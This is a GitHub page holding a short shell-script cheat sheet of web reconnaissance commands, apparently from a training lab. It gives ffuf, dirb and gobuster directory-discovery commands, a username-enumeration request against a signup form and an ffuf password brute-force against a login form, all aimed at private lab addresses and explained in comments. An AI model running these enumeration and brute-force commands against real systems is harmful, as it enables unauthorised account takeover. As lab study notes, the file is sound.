-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathwebRecon.sh
27 lines (21 loc) · 2.35 KB
/
webRecon.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Web App Recon Tools
## ffuf
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.80.133/FUZZ
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.70.78/customers/signup -mr "username already exists"
# In the above example, the -w argument selects the file's location on the computer that contains the list of usernames that we're going to
# check exists. The -X argument specifies the request method, this will be a GET request by default, but it is a POST request in our example.
# The -d argument specifies the data that we are going to send. In our example, we have the fields username, email, password and cpassword.
# We've set the value of the username to FUZZ. In the ffuf tool, the FUZZ keyword signifies where the contents from our wordlist will
# be inserted in the request. The -H argument is used for adding additional headers to the request.
# In this instance, we're setting the Content-Type so the web server knows we are sending form data.
# The -u argument specifies the URL we are making the request to, and finally, the -mr argument is the text on the page we are looking for to
# validate we've found a valid username.
## dirb
dirb http://10.10.80.133/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
## gobuster
gobuster dir --url http://10.10.80.133/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
# Brute Force
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.70.78/customers/login -fc 200
# This ffuf command is a little different to the previous one in Task 2. Previously we used the FUZZ keyword to select where in the request the
# data from the wordlists would be inserted, but because we're using multiple wordlists, we have to specify our own FUZZ keyword. In this instance, we've chosen W1 for our list of valid usernames and W2 for the list of passwords we will try. The multiple wordlists are again specified with the -w argument but separated with a comma.
# For a positive match, we're using the -fc argument to check for an HTTP status code other than 200.